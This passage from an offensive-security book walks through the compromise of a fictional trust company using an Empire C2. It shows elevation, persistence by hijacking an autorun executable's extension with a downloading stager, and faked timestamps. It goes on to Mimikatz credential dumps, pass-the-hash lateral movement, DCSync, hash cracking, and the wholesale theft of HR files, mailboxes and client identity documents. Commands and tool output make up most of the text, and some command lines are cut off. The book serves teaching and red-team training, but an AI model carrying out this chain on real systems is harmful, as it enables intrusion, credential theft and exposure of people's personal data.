(Empire:) > interact 672S4HKR

(Empire: 672S4HKR) > usemodule privesc/ask
(Empire: ask) > set Listener https_1
(Empire: ask) > run
Job started: XS8A57

[*] Successfully elevated!

[+] Initial agent REH4UX5P from now active (Slack)

Bouya! A new admin session phones back home:

(Empire: 672S4HKR) > agents

Name Internal IP Machine Name Username

REH4UX5P WV0012 *GSTRUST\admin.sarah
672S4HKR WV0012 GSTRUST\sarah

Now we’re talking!

Before moving any further, let’s pause a second to talk about

persistence. Technically speaking, having eight shells worldwide could
be considered as a form of weak persistence.

However, now that we have admin privileges on Sarah’s computer,

why not devise a more reliable form of persistence that could survive a
reboot and sustain our admin privileges over this box independently of
what happens to the network link?

There are many techniques available, from registering WMI events to

creating services and autorun registry keys. Mark Russinovich’s
autorunsc program probably contains the single most comprehensive
list of places to hide our payload102.

102Brilliant presentation at DerbyCon

In this particular scenario, we will opt for a simple, yet nifty technique
called Extension Search Order Hijacking. See, on a Windows machine,
when executing “calc” from a command line interpreter, for instance, the
system will first look for “”. Only if it cannot find it, does it then
look for and executes “cmd.exe”.

This means that if we place a fake “” in the

C:\Windows\System32 directory, we will effectively hijack most of the
calls to the real calculator, so long as the user or program runs “calc”
without specifying the extension.

To leverage this property to achieve persistence, we need to find a

current executable set to run at startup, then simply erase its extension.
We can look in the classic RUN key for such a candidate:

Empire: REH4UX5P) > shell reg query


Enhanced Performance Keybpard REG_SZ "C:\Program

Files\Lenovo\USB Enhanced Performance Keyboard\SKDaemon.exe"


Files\Lenovo\Communications Utility\TPKNRRES.exe"

AdobeAAMUpdater-1.0 REG_SZ "C:\Program Files (x86)\Common


AdobeGCIvoker-1.0 REG_SZ "C:\Program Files (x86)\Common


Plenty of fish in the sea! We erase the extension “.exe” from the
AGCInvokerUtility program using the reg add command:

Empire: REH4UX5P) > shell reg add

n" /t REG_SZ /v "AdobeGCIvoker-1.0" /d "C:\Program Files
(x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility" /f

To complete the persistence scheme, we simply put a normal

executable with the same name, but bearing a “.COM” extension
(AGCInvokerUtility.COM) in the same folder, and we can be sure that it
will effectively be called next time the system starts. Brilliant, right?
Our executable can essentially be the same piece of C# code we
included in StratAccounting; a small stager of a dozen lines of code, that
downloads the encoded PowerShell script then executes it on the
machine (sample script on Github:

Once we compile the file, we rename it to "AGCInvokerUtility.COM”

and place it in the “C:\Program Files (x86)\Common
Files\Adobe\AdobeGCClient\” folder.

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /unsafe
/out:AGCInvokerUtility.COM shellcode.cs

Empire: REH4UX5P) > cd "C:\Program Files (x86)\Common


Empire: REH4UX5P) > upload AGCInvokerUtility.COM

To make it blend in more, we change its MAC (modification, access

and creation) time to further blur the trail.

Empire: REH4UX5P) > powershell $(get-item

AGCInvokerUtility.COM).creationtime=$(get-date '02/12/2013

Empire: REH4UX5P) > powershell $(get-item

myphoto01.jpg).lastaccesstime=$(get-date '02/12/2013 12:31')

Empire: REH4UX5P) > powershell $(get-item

myphoto01.jpg).lastwritetime=$(get-date '02/12/2013 12:31')

Now that we have a reliable admin persistence scheme, let’s get back
to business.

Using Sarah’s admin account, we try connecting to G&S Trust servers

in all five regions, but it seems her privileges are limited to her workstation
only, which is to be expected from a regular accountant who probably
needed temporary admin rights to use or install a specific tool.

Nothing to worry about—we still have plenty of arrows in our quiver.

When you give it a moment’s thought, Windows does keep a

surprising number of passwords disseminated in the four corners of the
operating system. Almost every hacker is familiar with the SAM database
storing local account password hashes and the LSASS process keeping
hashes or passwords of recently connected users. Lesser known,
however, are the Windows vault and SECURITY hive.
Third-party applications (Internet Explorer, Outlook, Wi-Fi...) can use
the Windows vault to store user credentials in an encrypted and secure
way. While interesting in some specific use cases where the main goal is
to harvest data from certain applications, it will do little to help us gain
access to other servers.

The SECURITY hive, on the other hand, is a much more interesting

target. This file (mapped to the registry key HKLM\SECURITY) keeps
track of NTLM hashes of domain users that opened an interactive session
on the machine103.

That’s right; if an IT support admin remotely connected to Sarah’s

computer last week, their NTLM hash is still in there, provided that the
domain caching policy is set high enough (ten days in the case of G&S

Empire: REH4UX5P) > shell reg query

"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v

CachedLogonsCount REG_SZ 10

Mimikatz can obviously dig up all these passwords, so we just call an

in-memory execution of the lsadump module to retrieve passwords
stored in the SECURITY hive:

Empire: REH4UX5P) > usemodule credentials/mimikatz/lsadump*

Empire: lsadump) > run

mimikatz(powershell) # lsadump::lsa /patch

Domain : STAT-DO-08 / S-1-5-21-1888508460-581619696-3689331320

RID : 000003e8 (1002)
User : admin.joey
LM :
NTLM : 6C2459549C56B5B0E8AA702419641366

RID : 000003e8 (1000)

User : admin.sarah
LM :
NTLM : 8BCE166D3365DF4D52ED568374F06E68

103 These HASHES are encrypted using a secret key stored in the SYSTEM
registry. To dump it locally, we can use the of the Impacket tools
and feed it the SYSTEM and SECURITY files:
Bingo! The million-dollar question now becomes: does admin.joey
hold elevated privileges over any server? The account is part of the “GS
Server Maintenance” group, so it should at least be admin on a server or

root@C2Server:~# cd Empire/downloads/7S92RXMZ
root@C2Server:~# grep -A1 -I "givenname : admin.joey"
givenname : admin.joey
memberof : CN=GS Server Maintenance,CN=Users,...
givenname : admin.joey
memberof : CN=Users,DC=gstrust,DC=corp

The quickest way to know is to launch a new Empire agent and test it
for ourselves. For that, we use the invoke_wmi module and target the
only server hosted in the OU Cyprus (the same one containing Sarah’s
account) GS-CS-01:

(Empire: REH4UX5P) > creds add GSTRUST admin.joey

6C2459549C56B5B0E8AA702419641366 A hash
CredID CredType Domain UserName Password
------ -------- ------ -------- --------
1 hash GSTRUST admin.joey 6C2459549C56B5B0E...

(Empire: REH4UX5P) > usemodule lateral_movement/invoke_wmi

(Empire: invoke_wmi) > set Listener https_1
(Empire: invoke_wmi) > set CredID 1
(Empire: invoke_wmi)> set ComputerName GS-CS-01.GSTRUST.CORP
(Empire: invoke_wmi) > run

[+] Initial agent EM57KLGF from now active

As expected, admin.joey does indeed hold admin privileges on this

machine and most probably on all other servers as well since the “GS
Server Maintenace” group is part of the local administrators group:

(Empire: invoke_wmi) > interact EM57KLGF

Empire: EM57KLGF) > shell net localgroup administrators

GSTRUST\Domain admins
GSTRUST\GS Server Maintenance
It is interesting to note that the regional compartmentalization so
rigorously applied for business type accesses is not replicated for IT
admin accesses. Then again, they probably did not care to afford a local
IT team in each office.

We spawn a new agent on the same server to get an elevated session

(module bypassuac), then launch Mimikatz to retrieve passwords104 :

Empire: EM57KLGF) > usemodule privesc/bypassuac_eventvwr

Empire: bypassuac) > run

[+] Initial agent NFRSE1T2 from now active (Slack)

Empire: bypassuac) > interact NFRSE1T2

Empire: NFRSE1T2) > mimikatz
msv :
[00000003] Primary
* Username : admin.gloria
* Domain : GSTRUST
* NTLM : 8FC3C28E0D042760C4CD4B64A5A4C2ED
* SHA1 : 965880f68df8481d857217139865f36324f78bf7

As chance would have it, admin.gloria does belong to the domain

admin group:

root@C2Server:~# cd Empire/downloads/7S92RXMZ
root@C2Server:~# grep -A1 -I "givenname :
givenname : admin.gloria
memberof : CN=Domain Admins,CN=Users,DC=gstrust,...

We could almost scream “victory!” at this point, but we already knew

when we received the first shell that it would only be a matter of hours
before breaking G&S Trust.

Rarely do niche companies think about anything else other than their
business and growth prospects, so once we are inside, it’s almost game
over. As previously stated, who’s going to pay for a fully dedicated team
to monitor a dozen servers and twenty workstations?

In any case, now that the official “breach” part is over, we can finally
focus on what matters most: data.

104 We can always set up the WDigest registry key then come back a few days
later and relaunch Mimikatz to get clear-text passwords
Using our domain admin account (admin.gloria), we spawn a new
elevated agent on the Cyprus server GS-CS-01. We could plant another
reverse shell binary using the same persistence scheme we used earlier,
just to be on the safe side, and in case we lose admin access on Sarah’s

The network is essentially flat, so we can reach any system in any of

the five geographic locations from this single server. We go back to our
Invoke-Share results and start browsing all other shares that were
previously unavailable to Sarah’s account:

Empire: NFRSE1T2) > shell dir \\GS-ML-02.gstrust.corp\HR

LastWriteTime length Name

------------- ------ ----
3/11/2018 2:18:25 PM Employees Worldwide
3/8/2018 5:41:47 PM Bonuses
2/20/2018 10:32:49 PM Legal HR documents
2/12/2018 10:32:49 PM Reviews

We get the partner’s fat bonuses, employee’s salaries, reviews and

other personal data, but that’s not what we really came for. We inspect a
couple of more share folders, absorbing every document we can, from
budget meetings to holiday pictures of the board members.

The harder we look, the more convinced we become that there is no

“magic” folder holding a list of corporations and their direct beneficiaries.
That does not make any sense.

Even offshoring companies are obliged to comply with typical know-

your-customer (KYC) rules like asking for ID and proof of address. The
data must be here somewhere, we simply cannot find it.

Let’s try our luck with email inboxes instead. A good number of
workstations have the SMB port open (using the network/portscan
module in Empire), so it is just a matter of downloading their Outlook file
cache (OST file) to our C2 server:

Empire: NFRSE1T2) > usemodule


Empire: portscan) > set Ports 445,3389,135,137

Empire: portscan) > set HostFile /root/list_workstations.txt
Empire: portscan) > execute

Hostname OpenPorts
-------- ---------
WL0912.gstrust.corp 445
WG0081.gstrust.corp 445,135,3389

Empire: NFRSE1T2) > download

look\[email protected]

These high executive people perform 90% of their work from their
iPhones and tablets, so you can imagine the amount of information
exchanged internally, from passport scans to tax forms and share
certificates and many more sensitive documents. We load the OST file
into the regular Outlook software and download any interesting
attachment files:

The raw data is here, though processing these gigabytes of data (email
inboxes, attachments, PDFs, Excel and docx files from shares) to connect
the dots will, without any doubt, require some hardcore investigative work.

These thousands of emails help us alleviate the last wall of fog

surrounding G&S Trust. The famous location where they store all
sensitive documents related to their shell corporations is actually a virtual
data room hosted by a third party, a sort of secure storage frequently used
by legal teams during merger and acquisition deals and other sensitive
According to the email, we know that at least Mike and Harvey have
access to this web application, and chances are they use the same
Windows passwords, so let’s first retrieve that using Mimikatz’s DCSync
feature, which impersonates a domain controller to retrieve password

Empire: NFRSE1T2) > usemodule credentials/mimikatz/dcsync

Empire: dcsync) > set user harvey

(Empire: dcsync) > set domain GSTRUST.CORP
(Empire: dcsync) > run

Hostname: ML-AD-01.GSTRUST.CORP / S-1-5-21-2376009117-2296651833-

.#####. mimikatz 2.1 (x64)
.## ^ ##. "A La Vie, A L'Amour"
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi`
'## v ##'
'#####' with 18 modules * * */

mimikatz(powershell) # lsadump::dcsync /user:harvey

[DC] GSTRUST.CORP' will be the domain
[DC] 'ML-AD-01.GSTRUST.CORP' will be the DC server
[DC] harvey will be the user account


SAM Username : harvey

User Principal Name : [email protected]
Hash NTLM: 9A7D1A7FAAAF52DB5559E93CE72F1E42

We can crack this NTLM hash using our famous password-cracking

rig. NTLM is more than 150 times faster to crack than Kerberos algorithm
eType 23, which means we can reach 65 billion hashes per second on
our modest P2x8 AWS instance.

After just a few minutes, we land Harvey’s password: Armani0! Now

we can finally access the virtual data room used by G&S Trust:

Even if, by some miracle, we could not stumble upon the clear-text
password, we can always plant a keylogger on Harvey’s computer,
retrieve saved Firefox passwords105, extract saved credentials in the
Windows Vault106, or explore personal documents on his workstation, etc.
Once we are domain admins, almost all accounts fall like leaves on a cold
November night.

Bingo! Finally, after so many weeks of struggle, we reach the holy grail
beautifully laid out in hundreds of subfolders, each containing passport
IDs, share certificates, dividends, property titles, etc.

Now it is just a matter of downloading these many gigabytes of data

and relaying the information to the ICIJ (International Consortium of
Investigative Journalists)...or the highest bidder.

Closing thoughts
The main purpose of this book, which I hope I have strongly conveyed
throughout these pages, is to train you to adopt this innate reflex of
questioning not only which protection mechanisms are installed, but also
which detection watchdogs are in place. Which events are monitored?
How are they monitored? Can the company spot discrepancies in the
network traffic? What about system activity? These are the questions I
hope you will be asking going forward.

These parameters will provide strong clues about how “loud” you can
be on the target’s network. You can then decide which set of techniques
and tools to use. In the end, leaking data or getting domain admin
accounts is not a real victory if you get detected a week later for bluntly
launching a mass in-memory Mimikatz on 150 servers.

Obviously, I mainly focused on Microsoft products in this book (ATA

and ATP) because I really appreciate the effort and thought they have put
into them. And unlike many other vendors, they are not (that) full of shit.
In real life, however, you may encounter at least a dozen other next-gen
tools, but I hope I have shared enough ideas with you to try when you
suspect tools of this kind are running in a company’s network.

As always, have fun pwning107 the world!

107 Legally, of course.

Because your opinion matters

Email me at [email protected]
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